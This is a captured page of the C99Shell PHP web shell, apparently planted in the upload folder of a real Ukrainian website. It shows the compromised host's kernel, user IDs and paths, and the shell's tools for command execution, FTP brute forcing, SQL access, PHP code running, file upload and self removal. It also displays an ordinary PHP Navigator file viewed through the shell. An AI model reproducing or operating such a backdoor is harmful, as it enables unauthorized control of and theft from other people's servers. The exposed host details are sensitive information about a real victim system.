!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/zt-tsou.org.ua/modules/upload/   drwxr-xr-x
Free 106.79 GB of 200.55 GB (53.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     explore.php (2 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
#---------------------------
# PHP Navigator 4.37
# dated: January 23, 2009
# Coded by: Cyril Sebastian,
#             Kerala,India
# web: navphp.sourceforge.net
#---------------------------

#----------FUNCTION EXPLORE----------
#This is the core of the script which lists the files and folders
#and display them in explorer style.
#------------------------------------

function explore($dir)
{
global 
$cols$uploads,$i$dir_relative;
print
"<table cellspacing=8  id=filestable><tr class=center>";
     
if (
is_dir($dir)) 
 {
 if(
$dh opendir($dir)) 
  {
  while ((
$file readdir($dh)))  {$files[] = $file;}
  
sort($files);
  
$i=1;
  foreach(
$files as $file)
   {
   if(
$file!="."&&$file!=".."&&is_dir($file))
    {
     print 
"<td onmousedown=loadtd(this)>";
     
filestatus($file);    # function to print file icon & details
     
print "</td>\n";
     if(
$i%$cols==0)
      print
"</tr><tr class=center>";
     
$i=$i+1;            
    }
   }
  
  if(
$_COOKIE['navphp_arrange']=="type")    #sort by type
  
{
      foreach(
$files as $file)
        {
        
$data=pathinfo($file);
        
$exts[]=strtolower($data["extension"]);
        }
      
array_multisort($exts,SORT_STRING ,SORT_ASC,$files); 
  }
  else if(
$_COOKIE['navphp_arrange']=="size")    #sort by size
  
{
      foreach(
$files as $file)
        {
        
$sizes[]=filesize($file);
        }
      
array_multisort($sizes,SORT_NUMERIC ,SORT_ASC,$files); print "size";
  }
  
  foreach(
$files as $file)
   {
if(
$file!="."&&$file!=".."&&!is_dir($file))
    {
     print 
"<td onmousedown=loadtd(this)>";
     
filestatus($file);    # function to print file icon & details
     
print "</td>\n";
     if(
$i%$cols==0)
      print
"</tr><tr class=center>";
     
$i=$i+1;            
    }
   }
  
closedir($dh);
  }
 }
else
 
$msg[]= "Directory $dir does not exist!";
$total count($files)-2;
$perms decoct(fileperms($file)%01000);
print
"</table><input type=hidden name=total value='$total'>
      <input type=hidden name=perms value='
$perms'></form><br>
      <table class=window  width=100%><tr><td>"
;
printbuttons($dir,1);
print
"</td></tr></table><br>";

}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0123 ]--